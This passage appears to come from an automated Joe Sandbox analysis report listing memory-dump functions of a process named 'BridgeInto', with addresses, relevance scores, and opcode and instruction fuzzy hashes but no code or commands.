                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.2544998388.00007FFD34691000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34691000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffd34691000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: M
                                      • API String ID: 0-3664761504
                                      • Opcode ID: 7bc674b8033323f9986ebbe2382657f383baa082a2eeba419bc3300fe269b689
                                      • Instruction ID: 3bb68d6571e3071a4dea7cc3531de9387e48581ab0275b5d6490ff9ae42aef0a
                                      • Opcode Fuzzy Hash: 7bc674b8033323f9986ebbe2382657f383baa082a2eeba419bc3300fe269b689
                                      • Instruction Fuzzy Hash: 1511D371A0E6C84FDB569F7488A90E87FB0EF9B211B0905FBD549CF1A3DA6C5889C701
                                      Function 00007FFD3469AC59 Relevance: 1.3, Strings: 1, Instructions: 53COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.2544998388.00007FFD34691000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34691000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffd34691000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: M
                                      • API String ID: 0-3664761504
                                      • Opcode ID: 331f7fdb4bd842dfccaf077e98bec648b340a61d61fc0b3fdc9700ec7b940c1b
                                      • Instruction ID: deb56b000aa88ce3e1ab77b48638b5d6731fbc2dd633aae98e9f808caecba482
                                      • Opcode Fuzzy Hash: 331f7fdb4bd842dfccaf077e98bec648b340a61d61fc0b3fdc9700ec7b940c1b
                                      • Instruction Fuzzy Hash: 4F01F561A0E7D14FEB5AAA3508B90A47FA0DF93210B0901EFC185CF1E3D95D5C89C342
                                      Function 00007FFD34692539 Relevance: 1.3, Strings: 1, Instructions: 28COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.2544998388.00007FFD34691000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34691000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffd34691000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: M
                                      • API String ID: 0-3664761504
                                      • Opcode ID: a5ebe1226507220733dc572d8bce62de2ab5495808514aac79111ccf3d53535f
                                      • Instruction ID: 82a1fe643fec2f3a03fc7735f9fab97ea7e98ac45e1aece43935458190a9569a
                                      • Opcode Fuzzy Hash: a5ebe1226507220733dc572d8bce62de2ab5495808514aac79111ccf3d53535f
                                      • Instruction Fuzzy Hash: 29F0657190A3C44FCB55DA3884654947F60EF6721174A51EEC046CB1A7EA2DDC85C701
                                      Function 00007FFD3469AD29 Relevance: 1.3, Strings: 1, Instructions: 28COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.2544998388.00007FFD34691000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34691000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffd34691000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: M
                                      • API String ID: 0-3664761504
                                      • Opcode ID: 5cb7650fc104a2e4e3408c82545bb5d69e752caa4ab833467a016f1d69614d31
                                      • Instruction ID: 12c4b8bc2354fccfec0e8ad66c7a37d44388a025daad8f7bc31bc11e7804ebff
                                      • Opcode Fuzzy Hash: 5cb7650fc104a2e4e3408c82545bb5d69e752caa4ab833467a016f1d69614d31
                                      • Instruction Fuzzy Hash: B3F0E53090F7C44FC7069A3488684407FA0EF6720134A11EFC085CF1A3EA2CD888CB01
                                      Function 00007FFD346925C9 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.2544998388.00007FFD34691000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34691000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffd34691000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: I
                                      • API String ID: 0-3707901625
                                      • Opcode ID: 86dc2f27c9844aa940c661d065915219e9564cc33c8e9960cd3bb7aa4f15b046
                                      • Instruction ID: 8bde61df71e69e79a5ef6357b205f5f31acd8013abad499cc389d3726d79c62e
                                      • Opcode Fuzzy Hash: 86dc2f27c9844aa940c661d065915219e9564cc33c8e9960cd3bb7aa4f15b046
                                      • Instruction Fuzzy Hash: 86E0E56154F7C04FCB46AB7488698447FA0AE6721078A45EEC146CB1A3E62E8849C701
                                      Function 00007FFD346989A9 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.2544998388.00007FFD34691000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34691000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffd34691000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: I
                                      • API String ID: 0-3707901625
                                      • Opcode ID: 4ef7049397d29888d1156f9527e48a9328343d29bf57762c6d914737f71de56c
                                      • Instruction ID: 533485b8d35db02cb55f120b95d1b10bbd647d834e2777f046aa921ec188bdf7
                                      • Opcode Fuzzy Hash: 4ef7049397d29888d1156f9527e48a9328343d29bf57762c6d914737f71de56c
                                      • Instruction Fuzzy Hash: AAE01A7198E7C04FCB06EB7488698447FB0AE6721078B41EEC145CF1B3E62E8849C701
                                      Function 00007FFD346608D0 Relevance: .2, Instructions: 172COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.2544998388.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffd34660000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f8f89c2af38154685882b8c913a25c3a40d79ac6441385e9cd1d86bba35cd896
                                      • Instruction ID: a5a781480da0929e21ce484a1a0ef0528309e29adb27029b0eef7fb77d158f55
                                      • Opcode Fuzzy Hash: f8f89c2af38154685882b8c913a25c3a40d79ac6441385e9cd1d86bba35cd896
                                      • Instruction Fuzzy Hash: 4E41013260CA654FD714EBACE4A99FA7BD0EF9632570405BBD189CB063DE18A8818781
                                      Function 00007FFD3466090D Relevance: .2, Instructions: 150COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.2544998388.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffd34660000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e6d3b3b1bd618147c1c061444c8fde93727ebb5a9dfdc302a7cdf222992b49fb
                                      • Instruction ID: 50bf1915af2cebcee3dff65cece2a58ae509c2b64e3bfc570e9a2cd7bf40e2ff
                                      • Opcode Fuzzy Hash: e6d3b3b1bd618147c1c061444c8fde93727ebb5a9dfdc302a7cdf222992b49fb
                                      • Instruction Fuzzy Hash: 8F412622B4D6A61EE714B7F8A4BA1FA7B90DF96335B1404BFD18EC7193CD1C68818285
                                      Function 00007FFD34692CB6 Relevance: .1, Instructions: 120COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.2544998388.00007FFD34691000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34691000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffd34691000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: dcb94bebb23e742a87cafee4d129fe9a22b97399443dde684e244bff1b03fe25
                                      • Instruction ID: f7fbb0f3d7f0d90b322073505b4625cdb3077ace63e1cc58b0edb08c5341df47
                                      • Opcode Fuzzy Hash: dcb94bebb23e742a87cafee4d129fe9a22b97399443dde684e244bff1b03fe25
                                      • Instruction Fuzzy Hash: 2841A531B0C92A8FDB99EA48D4E57F877D1FB99310F04057AD04ED72C6CE686C858781
                                      Function 00007FFD34660908 Relevance: .1, Instructions: 118COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.2544998388.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffd34660000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b3368c1844a52ee59a3a97208f294735a0dec08c23f3eb80fd00a53f5a0f1fa5
                                      • Instruction ID: 3d52de3f35f9df7d9a6e88d21c665eabbc96a3d462fb370a86da02dbd3812ebe
                                      • Opcode Fuzzy Hash: b3368c1844a52ee59a3a97208f294735a0dec08c23f3eb80fd00a53f5a0f1fa5
                                      • Instruction Fuzzy Hash: 3121073130CC184FE768EE0CE88ADB973D1EF9A32130101BAE58EC7126E915EC8287C1
                                      Function 00007FFD34660960 Relevance: .1, Instructions: 116COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.2544998388.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffd34660000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 31ff291f4c9b94390fc26e03fa8a41bb33d41d45be31cac256c5429e7c625555
                                      • Instruction ID: 18ffcdb4930f3dea12d43b4e9a42a7b6b6f195984080c79e5c33889d2b212706
                                      • Opcode Fuzzy Hash: 31ff291f4c9b94390fc26e03fa8a41bb33d41d45be31cac256c5429e7c625555
                                      • Instruction Fuzzy Hash: B3315422B0DA661EF764B6F8A4AA1FA77C1DF96335B0400BED44EC31D3CC1C6C829280
                                      Function 00007FFD3466116D Relevance: .1, Instructions: 115COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.2544998388.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffd34660000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d217324ef66e4e25004fc3a1c530613dcfbc98aca58bdf306cf524b3f60a9340
                                      • Instruction ID: cedc483fa417dadda533909271d39d8a709ee4e8b6def9aa503b8cbcd9f84f71
                                      • Opcode Fuzzy Hash: d217324ef66e4e25004fc3a1c530613dcfbc98aca58bdf306cf524b3f60a9340
                                      • Instruction Fuzzy Hash: 8D41B731A0965A4FDB89EF78C8A59F97BE1FF5A310B0401BAD049D71A2DA2DA841CB40
                                      Function 00007FFD34660998 Relevance: .1, Instructions: 107COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.2544998388.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffd34660000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3187bc57587d800906e0b9a9eba71e801833588e6aa463e38e85794b56a40c83
                                      • Instruction ID: 40d370ea57dd1fbfd82ccf112cef51702d46b5607febaee6922835e0b1da17da
                                      • Opcode Fuzzy Hash: 3187bc57587d800906e0b9a9eba71e801833588e6aa463e38e85794b56a40c83
                                      • Instruction Fuzzy Hash: FB31F621B099650FEB58FA6894AA6B977C2EF9A321B5400BDD54EC32D3CD2CAC419341
                                      Function 00007FFD34660C25 Relevance: .1, Instructions: 98COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.2544998388.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffd34660000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 271bd2c9e7f0a66cc3250f606f0c2accca71d3288ab21e219422579a7d011343
                                      • Instruction ID: fd4ee8b455df5adb19a12b5476357b7f5433fb923e00b72dbbccf08d1c10ff60
                                      • Opcode Fuzzy Hash: 271bd2c9e7f0a66cc3250f606f0c2accca71d3288ab21e219422579a7d011343
                                      • Instruction Fuzzy Hash: A3313A75B0DA598EE711DF68D8A12ED7BA0EF83335F1441B6D148CA1C3DB3C248AA781
                                      Function 00007FFD34692601 Relevance: .1, Instructions: 89COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.2544998388.00007FFD34691000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34691000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffd34691000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5240b7e1ac74e62c31e6d7d7829092f5cebbf3adf6076e2abd211180674e2013
                                      • Instruction ID: d3640c151b9eabe5449c08dd815cabe21c689c6d6a846803bd14715e9490a49f
                                      • Opcode Fuzzy Hash: 5240b7e1ac74e62c31e6d7d7829092f5cebbf3adf6076e2abd211180674e2013
                                      • Instruction Fuzzy Hash: A121C521B0DAAA0FE7C5EAA858F92F867C1EF9A314F4404BBD54DC25D3CC5D68D59302
                                      Function 00007FFD34695494 Relevance: .1, Instructions: 70COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.2544998388.00007FFD34691000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34691000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffd34691000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 99e2a06e11cb529d866ecab10411221a290bb8b877bf9f513159337d31a45cba
                                      • Instruction ID: 46093204883d5fc5ae4bf8d68acfddcb07924cd8e1171dcde9682b5b6856d107
                                      • Opcode Fuzzy Hash: 99e2a06e11cb529d866ecab10411221a290bb8b877bf9f513159337d31a45cba
                                      • Instruction Fuzzy Hash: 38217F71B19A294FE7D8EB68C8A56F9B3D1FFA9300F5041B6D04DC3192CD686CC18B40
                                      Function 00007FFD346669E3 Relevance: .1, Instructions: 68COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.2544998388.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffd34660000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 632eeaeb019bd8f7c0fa8953c2a8cd982f86d65969ae015fe8d2c070821233e1
                                      • Instruction ID: 59897b745f8dedb038e6ece5392d1a56058f42bedff170126b7504b6ace47fbe
                                      • Opcode Fuzzy Hash: 632eeaeb019bd8f7c0fa8953c2a8cd982f86d65969ae015fe8d2c070821233e1
                                      • Instruction Fuzzy Hash: 69211B30E185698FDB65DF04D4A4BE9B3E1FB58314F1085AAC50EE3291CA79AE80CB80
                                      Function 00007FFD34660C38 Relevance: .1, Instructions: 56COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.2544998388.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffd34660000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: dbbcf8acb9f51da5d05d257d3922716d4595ef210c8aea85a61948bcadda95b2
                                      • Instruction ID: fe16f8f18c2d9d1dcd906e647ea9328d9c6a4d413458201c095d242eb62683d9
                                      • Opcode Fuzzy Hash: dbbcf8acb9f51da5d05d257d3922716d4595ef210c8aea85a61948bcadda95b2
                                      • Instruction Fuzzy Hash: DA11C275B0DA999FE712DF6888A11ED7BB0EF83321F1544B7C244DB182DA3C254AA790
                                      Function 00007FFD34660C40 Relevance: .0, Instructions: 50COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.2544998388.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffd34660000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 793ee1beab58696b812ab94413fe63b1aaf5d66ff193e429914ce17cae4dcbae
                                      • Instruction ID: 70daf8ae526e94243236b2d1610c938a1a23082825e02f70d88f78fa486f0525
                                      • Opcode Fuzzy Hash: 793ee1beab58696b812ab94413fe63b1aaf5d66ff193e429914ce17cae4dcbae
                                      • Instruction Fuzzy Hash: 7E11AD75A0EA999FE712DF6888A01ED7BB0EF43321F1541B6C144DB192DA3C6A49A780
                                      Function 00007FFD3469DF06 Relevance: .0, Instructions: 48COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.2544998388.00007FFD34691000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34691000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffd34691000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0f9c12e68d7bdd0ea4cad898674509f5f58dbcaa69196b00a9b58fb96adde332
                                      • Instruction ID: 0ce9d0ecdbcfd2610b844af947209d4d9afb8b3a8b24aeb569bbd02f3c6ba226
                                      • Opcode Fuzzy Hash: 0f9c12e68d7bdd0ea4cad898674509f5f58dbcaa69196b00a9b58fb96adde332
                                      • Instruction Fuzzy Hash: 5801B132F0852A4AEB54AD69C4AA3FD73E2EF95311F004576D109D3181DE6CA9809780
                                      Function 00007FFD34660C48 Relevance: .0, Instructions: 44COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.2544998388.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffd34660000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b508626ef6dacf0e9819857b53dc8f4a128181173a9a274d5f97f14ca55e2be2
                                      • Instruction ID: 4c14627fc67d2f5f8949c9be0efbc9b8ea393549d39e75a4a453d9f374aae551
                                      • Opcode Fuzzy Hash: b508626ef6dacf0e9819857b53dc8f4a128181173a9a274d5f97f14ca55e2be2
                                      • Instruction Fuzzy Hash: 4F018C75A0E6899FE712DF6488A00ED7BB0EF43320F1541F6D144DB192DA3C6A45A781
                                      Function 00007FFD34674D25 Relevance: .0, Instructions: 35COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.2544998388.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffd34670000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5fb04a8ecc67890db30c3a10eeb76e0e86e6b84df3085faa2cf8fe9194738d51
                                      • Instruction ID: 7eaa5668710505c6a8770bc4da07a221a161bf327ad9446c4549618c61bbbb36
                                      • Opcode Fuzzy Hash: 5fb04a8ecc67890db30c3a10eeb76e0e86e6b84df3085faa2cf8fe9194738d51
                                      • Instruction Fuzzy Hash: 68F09020B0892B8FFA15EE18ACF46F93690FB46310F008175D589C2196EE2CEC01A285
                                      Function 00007FFD34698119 Relevance: .0, Instructions: 25COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.2544998388.00007FFD34691000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34691000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffd34691000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 18786064ab274e79cb2592b507bbd95a9cdd7215e55c823b072be294e999161e
                                      • Instruction ID: 25af3ee9509e85d46305e844819e3a43ee7af388d3c761f41bba948837a1e9b1
                                      • Opcode Fuzzy Hash: 18786064ab274e79cb2592b507bbd95a9cdd7215e55c823b072be294e999161e
                                      • Instruction Fuzzy Hash: 7EE0922294E3C14FCB1B8A2488B88A03F60DF2720474A50FBC149CF2B3D91D980AC701
                                      Function 00007FFD3469E049 Relevance: .0, Instructions: 23COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.2544998388.00007FFD34691000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34691000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffd34691000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7ed5658f193dd664675722aada412d0781de334ca4db6afa0888a34df7ede998
                                      • Instruction ID: 98353e4fc3fb2548432acccc2c31ad9a839c99fe2402f8e1ebbbc4ceecd60958
                                      • Opcode Fuzzy Hash: 7ed5658f193dd664675722aada412d0781de334ca4db6afa0888a34df7ede998
                                      • Instruction Fuzzy Hash: 11E01A2294B7C04FCB4A9B2588A88847F70FE1721078A50EEC085CF5A3EA2D9859C711
                                      Function 00007FFD3469AC70 Relevance: .0, Instructions: 22COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.2544998388.00007FFD34691000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34691000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffd34691000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                      • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                      • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                      • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                      Function 00007FFD3469AD40 Relevance: .0, Instructions: 22COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.2544998388.00007FFD34691000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34691000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffd34691000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                      • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                      • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                      • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                      Function 00007FFD3469E0C9 Relevance: .0, Instructions: 21COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.2544998388.00007FFD34691000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34691000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffd34691000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3bd34f00fa8fd4d890f6f06160335a76710df39a7892ce5255c82b03097de7ac
                                      • Instruction ID: 915de819bf1efd9f345cf0bf27a97d6c460ae6f4f90771eb041992e06c8c6a80
                                      • Opcode Fuzzy Hash: 3bd34f00fa8fd4d890f6f06160335a76710df39a7892ce5255c82b03097de7ac
                                      • Instruction Fuzzy Hash: 07E01A2194E7C04FC70B9B3588A98547FB0AE1721074A41EBC145CF5A3D91A8C49C711
                                      Function 00007FFD34674597 Relevance: .0, Instructions: 19COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.2544998388.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffd34670000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fbf7d0ca8ec400512d92f2c675d5e0aeeb378bd9c7d57550f8f72fc9be8dae07
                                      • Instruction ID: 1f9b85b0f92c6c0e64d04d7b04ea1e9a5fc38d9e77a08f7520a104eeca117ceb
                                      • Opcode Fuzzy Hash: fbf7d0ca8ec400512d92f2c675d5e0aeeb378bd9c7d57550f8f72fc9be8dae07
                                      • Instruction Fuzzy Hash: 2EE08C31F1582E8BF7609F98DCA82FCABA0FF59604F800236C049D3281CE282C028740
                                      Function 00007FFD346925E0 Relevance: .0, Instructions: 18COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.2544998388.00007FFD34691000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34691000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffd34691000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                      • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                      • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                      • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                      Function 00007FFD34697700 Relevance: .0, Instructions: 17COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.2544998388.00007FFD34691000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34691000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffd34691000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a7ccd9d2cca88e0acce79a096b5c88f796d61db368ddf3302dbc1b77a8c09c83
                                      • Instruction ID: 623ffcf0ed7baf3a360e07beef1ffabf369265d787ebaead4a7ac76bec73ac90
                                      • Opcode Fuzzy Hash: a7ccd9d2cca88e0acce79a096b5c88f796d61db368ddf3302dbc1b77a8c09c83
                                      • Instruction Fuzzy Hash: CAD01234B609054F870CAA38889987473D1EB6A216B9550A9D00AC72B1D96ADC99C741
                                      Function 00007FFD3469C030 Relevance: .0, Instructions: 17COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.2544998388.00007FFD34691000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34691000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffd34691000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3837f371f4cc1c0e144a0ff12acbc3818e11e055e83570f8120d37e5c4023483
                                      • Instruction ID: 87bc4770447b7b5390ea8f34f9189bd5e6ca157af85bb44278dc435e90654657
                                      • Opcode Fuzzy Hash: 3837f371f4cc1c0e144a0ff12acbc3818e11e055e83570f8120d37e5c4023483
                                      • Instruction Fuzzy Hash: F3D02230B908044F870CAA38C898C743390EB6A20279000A8D00AC72B1D96ADC98C740
                                      Function 00007FFD34660B9A Relevance: .0, Instructions: 15COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.2544998388.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffd34660000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ea49223fd1a816fd1b362e084a2150523c639c30c7cf8a22846f769d5ebcd9de
                                      • Instruction ID: 7cad4ae71697c65f5ed97aa7d4d5c5b881b8cdf4fc4a5a73e8da78e10dab1e8d
                                      • Opcode Fuzzy Hash: ea49223fd1a816fd1b362e084a2150523c639c30c7cf8a22846f769d5ebcd9de
